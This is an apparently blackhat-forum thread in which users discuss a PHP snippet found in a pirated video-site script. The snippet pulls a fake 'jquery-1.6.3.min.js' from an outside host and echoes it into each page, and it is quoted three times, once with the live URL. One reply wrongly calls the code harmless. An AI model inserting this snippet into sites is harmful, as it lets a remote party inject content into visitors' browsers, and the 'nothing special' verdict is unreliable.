wooow calm down cowboy !!!
Code:
<?php if(function_exists('curl_init')) { $url = "http://laland.at.vu/data/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }?>
WTXXXX are you trying to do here !!!!
(01-21-2013 04:17 AM)demomeb Wrote: [ -> ]wooow calm down cowboy !!!
Code:
<?php if(function_exists('curl_init')) { $url = "/data/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }?>
WTXXXX are you trying to do here !!!!
Hi
[b]demomeb[/b] can i ask what's this code about? I have this on my (running website) avs script exactly the same code. its on index and footer. I downloaded the avs script here in bestblackhatforum
http://bestblackhatforum.com/Thread-GET-...ss-Grabber
What should i do? delete the code?
Guys before you install any of script to own server from any site check the code script to prevent infections if exist.
(06-03-2013 02:46 AM)Sex_Machine Wrote: [ -> ] (01-21-2013 04:17 AM)demomeb Wrote: [ -> ]wooow calm down cowboy !!!
Code:
<?php if(function_exists('curl_init')) { $url = "/data/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }?>
WTXXXX are you trying to do here !!!!
Hi [b]demomeb[/b] can i ask what's this code about? I have this on my (running website) avs script exactly the same code. its on index and footer. I downloaded the avs script here in bestblackhatforum
/Thread-GET-Adult-Video-Script-2-2-Non-Adult-and-Mass-Grabber
What should i do? delete the code?
your code have nothing special. Go to /data/jquery-1.6.3.min.js and replace with original jquery or replace with //ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js